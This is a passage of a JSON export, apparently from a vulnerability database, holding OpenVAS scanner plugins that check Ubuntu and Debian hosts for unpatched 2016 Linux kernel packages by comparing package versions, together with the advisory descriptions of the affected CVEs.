"CVE-2016-3134"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842690", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842690", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-lts-trusty USN-2929-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842690\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-15 06:36:33 +0100 (Tue, 15 Mar 2016)\");\n script_cve_id(\"CVE-2016-3134\", \"CVE-2013-4312\", \"CVE-2015-7566\", \"CVE-2015-7833\",\n\t\t\"CVE-2016-0723\", \"CVE-2016-2384\", \"CVE-2016-2543\", \"CVE-2016-2544\",\n\t\t\"CVE-2016-2545\", \"CVE-2016-2546\", \"CVE-2016-2547\", \"CVE-2016-2548\",\n\t\t\"CVE-2016-2549\", \"CVE-2016-2782\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-lts-trusty USN-2929-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-trusty'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Ben Hawkes discovered that the Linux\n netfilter implementation did not correctly perform validation when handling\n IPT_SO_SET_REPLACE events. A local unprivileged attacker could use this to\n cause a denial of service (system crash) or possibly execute arbitrary code\n with administrative privileges. (CVE-2016-3134)\n\n It was discovered that the Linux kernel did not properly enforce rlimits\n for file descriptors sent over UNIX domain sockets. A local attacker could\n use this to cause a denial of service. (CVE-2013-4312)\n\n Ralf Spenneberg discovered that the USB driver for Clie devices in the\n Linux kernel did not properly sanity check the endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2015-7566)\n\n Ralf Spenneberg discovered that the usbvision driver in the Linux kernel\n did not properly sanity check the interfaces and endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2015-7833)\n\n It was discovered that a race condition existed in the ioctl handler for\n the TTY driver in the Linux kernel. A local attacker could use this to\n cause a denial of service (system crash) or expose sensitive information.\n (CVE-2016-0723)\n\n Andrey Konovalov discovered that the ALSA USB MIDI driver incorrectly\n performed a double-free. A local attacker with physical access could use\n this to cause a denial of service (system crash) or possibly execute\n arbitrary code with administrative privileges. (CVE-2016-2384)\n\n Dmitry Vyukov discovered that the Advanced Linux Sound Architecture (ALSA)\n framework did not verify that a FIFO was attached to a client before\n attempting to clear it. A local attacker could use this to cause a denial\n of service (system crash). (CVE-2016-2543)\n\n Dmitry Vyukov discovered that a race condition existed in the Advanced\n Linux Sound Architecture (ALSA) framework between timer setup and closing\n of the client, resulting in a use-after-free. A local attacker could use\n this to cause a denial of service. (CVE-2016-2544)\n\n Dmitry Vyukov discovered a race condition in the timer handling\n implementation of the Advanced Linux Sound Architecture (ALSA) framework,\n resulting in a use-after-free. A local attacker could use this to cause a\n denial of service (system crash). (CVE-2016-2545)\n\n Dmitry Vyukov discovered race conditions in the Advanced Linux Sound\n Architecture (ALSA) framework's timer ioctls leading to a use-after-free. A\n local attacker could use this to cause a denial of service (system crash)\n or possibly execute arbitrary code. (CVE-2016-2546)\n\n Dmitry Vyukov discovered th ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"linux-lts-trusty on Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2929-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2929-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-83-generic\", ver:\"3.13.0-83.127~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-83-generic-lpae\", ver:\"3.13.0-83.127~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:11", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-03-15T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux-lts-vivid USN-2932-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2384", "CVE-2016-2782", "CVE-2016-2543", "CVE-2016-2069", "CVE-2016-2548", "CVE-2016-0723", "CVE-2016-2547", "CVE-2016-2544", "CVE-2016-2545", "CVE-2015-7833", "CVE-2015-8767", "CVE-2013-4312", "CVE-2016-2546", "CVE-2015-7566", "CVE-2016-2549", "CVE-2016-3134"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842686", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842686", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-lts-vivid USN-2932-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842686\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-15 06:36:05 +0100 (Tue, 15 Mar 2016)\");\n script_cve_id(\"CVE-2016-3134\", \"CVE-2013-4312\", \"CVE-2015-7566\", \"CVE-2015-7833\",\n \t \"CVE-2015-8767\", \"CVE-2016-0723\", \"CVE-2016-2069\", \"CVE-2016-2384\",\n\t \"CVE-2016-2543\", \"CVE-2016-2544\", \"CVE-2016-2545\", \"CVE-2016-2546\",\n\t\t\"CVE-2016-2547\", \"CVE-2016-2548\", \"CVE-2016-2549\", \"CVE-2016-2782\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-lts-vivid USN-2932-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-vivid'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Ben Hawkes discovered that the Linux\n netfilter implementation did not correctly perform validation when handling\n IPT_SO_SET_REPLACE events. A local unprivileged attacker could use this to\n cause a denial of service (system crash) or possibly execute arbitrary code\n with administrative privileges. (CVE-2016-3134)\n\n It was discovered that the Linux kernel did not properly enforce rlimits\n for file descriptors sent over UNIX domain sockets. A local attacker could\n use this to cause a denial of service. (CVE-2013-4312)\n\n Ralf Spenneberg discovered that the USB driver for Clie devices in the\n Linux kernel did not properly sanity check the endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2015-7566)\n\n Ralf Spenneberg discovered that the usbvision driver in the Linux kernel\n did not properly sanity check the interfaces and endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2015-7833)\n\n It was discovered that a race condition existed when handling heartbeat-\n timeout events in the SCTP implementation of the Linux kernel. A remote\n attacker could use this to cause a denial of service. (CVE-2015-8767)\n\n It was discovered that a race condition existed in the ioctl handler for\n the TTY driver in the Linux kernel. A local attacker could use this to\n cause a denial of service (system crash) or expose sensitive information.\n (CVE-2016-0723)\n\n Andy Lutomirski discovered a race condition in the Linux kernel's\n translation lookaside buffer (TLB) handling of flush events. A local\n attacker could use this to cause a denial of service or possibly leak\n sensitive information. (CVE-2016-2069)\n\n Andrey Konovalov discovered that the ALSA USB MIDI driver incorrectly\n performed a double-free. A local attacker with physical access could use\n this to cause a denial of service (system crash) or possibly execute\n arbitrary code with administrative privileges. (CVE-2016-2384)\n\n Dmitry Vyukov discovered that the Advanced Linux Sound Architecture (ALSA)\n framework did not verify that a FIFO was attached to a client before\n attempting to clear it. A local attacker could use this to cause a denial\n of service (system crash). (CVE-2016-2543)\n\n Dmitry Vyukov discovered that a race condition existed in the Advanced\n Linux Sound Architecture (ALSA) framework between timer setup and closing\n of the client, resulting in a use-after-free. A local attacker could use\n this to cause a denial of service. (CVE-2016-2544)\n\n Dmitry Vyukov discovered a race condition in the timer handling\n implementation of the Advanced Linux S ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"linux-lts-vivid on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2932-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2932-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.19.0-56-generic\", ver:\"3.19.0-56.62~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.19.0-56-generic-lpae\", ver:\"3.19.0-56.62~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.19.0-56-lowlatency\", ver:\"3.19.0-56.62~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.19.0-56-powerpc-e500mc\", ver:\"3.19.0-56.62~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.19.0-56-powerpc-smp\", ver:\"3.19.0-56.62~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.19.0-56-powerpc64-emb\", ver:\"3.19.0-56.62~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.19.0-56-powerpc64-smp\", ver:\"3.19.0-56.62~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:50", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-05-10T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux USN-2967-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2782", "CVE-2016-2543", "CVE-2016-2069", "CVE-2016-2847", "CVE-2016-2548", "CVE-2016-0723", "CVE-2016-0774", "CVE-2016-2547", "CVE-2015-8812", "CVE-2016-2544", "CVE-2016-0821", "CVE-2015-7515", "CVE-2016-2545", "CVE-2015-7833", "CVE-2015-8767", "CVE-2013-4312", "CVE-2016-2546", "CVE-2015-7566", "CVE-2016-2549", "CVE-2015-1805"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842741", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842741", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux USN-2967-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842741\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-10 05:21:24 +0200 (Tue, 10 May 2016)\");\n script_cve_id(\"CVE-2013-4312\", \"CVE-2015-7515\", \"CVE-2015-7566\", \"CVE-2015-7833\",\n \t\t\"CVE-2015-8767\", \"CVE-2015-8812\", \"CVE-2016-0723\", \"CVE-2015-1805\",\n \t\t\"CVE-2016-0774\", \"CVE-2016-0821\", \"CVE-2016-2069\", \"CVE-2016-2543\",\n \t\t\"CVE-2016-2544\", \"CVE-2016-2545\", \"CVE-2016-2546\", \"CVE-2016-2547\",\n\t \t\"CVE-2016-2548\", \"CVE-2016-2549\", \"CVE-2016-2782\", \"CVE-2016-2847\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-2967-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that the Linux kernel did\n not properly enforce rlimits for file descriptors sent over UNIX domain sockets.\n A local attacker could use this to cause a denial of service. (CVE-2013-4312)\n\n Ralf Spenneberg discovered that the Aiptek Tablet USB device driver in the\n Linux kernel did not properly sanity check the endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2015-7515)\n\n Ralf Spenneberg discovered that the USB driver for Clie devices in the\n Linux kernel did not properly sanity check the endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2015-7566)\n\n Ralf Spenneberg discovered that the usbvision driver in the Linux kernel\n did not properly sanity check the interfaces and endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2015-7833)\n\n It was discovered that a race condition existed when handling heartbeat-\n timeout events in the SCTP implementation of the Linux kernel. A remote\n attacker could use this to cause a denial of service. (CVE-2015-8767)\n\n Venkatesh Pottem discovered a use-after-free vulnerability in the Linux\n kernel's CXGB3 driver. A local attacker could use this to cause a denial of\n service (system crash) or possibly execute arbitrary code. (CVE-2015-8812)\n\n It was discovered that a race condition existed in the ioctl handler for\n the TTY driver in the Linux kernel. A local attacker could use this to\n cause a denial of service (system crash) or expose sensitive information.\n (CVE-2016-0723)\n\n It was discovered that the Linux kernel did not keep accurate track of pipe\n buffer details when error conditions occurred, due to an incomplete fix for\n CVE-2015-1805. A local attacker could use this to cause a denial of service\n (system crash) or possibly execute arbitrary code with administrative\n privileges. (CVE-2016-0774)\n\n Zach Riggle discovered that the Linux kernel's list poison feature did not\n take into account the mmap_min_addr value. A local attacker could use this\n to bypass the kernel's poison-pointer protection mechanism while attempting\n to exploit an existing kernel vulnerability. (CVE-2016-0821)\n\n Andy Lutomirski discovered a race condition in the Linux kernel's\n translation lookaside buffer (TLB) handling of flush events. A local\n attacker could use this to cause a denial of service or possibly leak\n sensitive information. (CVE-2016-2069)\n\n Dmitry Vyukov discovered that the Advanced Linux Sound Architecture (ALSA)\n framework did not verify that a FIFO was attached to a client bef ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2967-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2967-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-102-generic\", ver:\"3.2.0-102.142\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-102-generic-pae\", ver:\"3.2.0-102.142\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-102-highbank\", ver:\"3.2.0-102.142\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-102-omap\", ver:\"3.2.0-102.142\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-102-powerpc-smp\", ver:\"3.2.0-102.142\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-102-powerpc64-smp\", ver:\"3.2.0-102.142\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-102-virtual\", ver:\"3.2.0-102.142\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:36", "description": "Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service, information\nleak or data loss.\n\nCVE-2013-4312\nTetsuo Handa discovered that users can use pipes queued on local\n(Unix) sockets to allocate an unfair share of kernel memory, leading\nto denial-of-service (resource exhaustion).\n\nThis issue was previously mitigated for the stable suite by limiting\nthe total number of files queued by each user on local sockets. The\nnew kernel version in both suites includes that mitigation plus\nlimits on the total size of pipe buffers allocated for each user.\n\nCVE-2015-7566\nRalf Spenneberg of OpenSource Security reported that the visor\ndriver crashes when a specially crafted USB device without bulk-out\nendpoint is detected.\n\nDescription truncated. Please see the references for more information.", "cvss3": {}, "published": "2016-03-08T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3503-1 (linux - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2384", "CVE-2016-2543", "CVE-2016-2069", "CVE-2016-2548", "CVE-2016-0723", "CVE-2016-0774", "CVE-2016-2547", "CVE-2015-8812", "CVE-2016-2544", "CVE-2015-8830", "CVE-2016-2550", "CVE-2016-2545", "CVE-2015-8767", "CVE-2013-4312", "CVE-2016-2546", "CVE-2015-7566", "CVE-2016-2549", "CVE-2015-8816", "CVE-2015-8785", "CVE-2015-1805"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703503", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703503", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3503.nasl 14279 2019-03-18 14:48:34Z cfischer $\n# Auto-generated from advisory DSA 3503-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703503\");\n script_version(\"$Revision: 14279 $\");\n script_cve_id(\"CVE-2013-4312\", \"CVE-2015-1805\", \"CVE-2015-7566\", \"CVE-2015-8767\", \"CVE-2015-8785\", \"CVE-2015-8812\", \"CVE-2015-8816\", \"CVE-2015-8830\", \"CVE-2016-0723\", \"CVE-2016-0774\", \"CVE-2016-2069\", \"CVE-2016-2384\", \"CVE-2016-2543\", \"CVE-2016-2544\", \"CVE-2016-2545\", \"CVE-2016-2546\", \"CVE-2016-2547\", \"CVE-2016-2548\", \"CVE-2016-2549\", \"CVE-2016-2550\");\n script_name(\"Debian Security Advisory DSA 3503-1 (linux - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:48:34 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-08 12:37:38 +0530 (Tue, 08 Mar 2016)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3503.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(8|7)\");\n script_tag(name:\"affected\", value:\"linux on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (wheezy), these problems have been fixed\nin version 3.2.73-2+deb7u3. The oldstable distribution (wheezy) is not\naffected by CVE-2015-8830\n.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 3.16.7-ckt20-1+deb8u4. CVE-2015-7566, CVE-2015-8767 and\nCVE-2016-0723 were already fixed in DSA-3448-1. CVE-2016-0774\ndoes not\naffect the stable distribution.\n\nWe recommend that you upgrade your linux packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service, information\nleak or data loss.\n\nCVE-2013-4312\nTetsuo Handa discovered that users can use pipes queued on local\n(Unix) sockets to allocate an unfair share of kernel memory, leading\nto denial-of-service (resource exhaustion).\n\nThis issue was previously mitigated for the stable suite by limiting\nthe total number of files queued by each user on local sockets. The\nnew kernel version in both suites includes that mitigation plus\nlimits on the total size of pipe buffers allocated for each user.\n\nCVE-2015-7566\nRalf Spenneberg of OpenSource Security reported that the visor\ndriver crashes when a specially crafted USB device without bulk-out\nendpoint is detected.\n\nDescription truncated. Please see the references for more information.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"linux-compiler-gcc-4.8-arm\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-compiler-gcc-4.8-s390\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-compiler-gcc-4.8-x86\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-doc-3.16\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-4kc-malta\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-586\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-5kc-malta\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-686-pae\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-amd64\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-arm64\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-armel\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-armhf\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-i386\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-mips\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-mipsel\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-powerpc\", ver:\"3.16.7-ckt20-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += 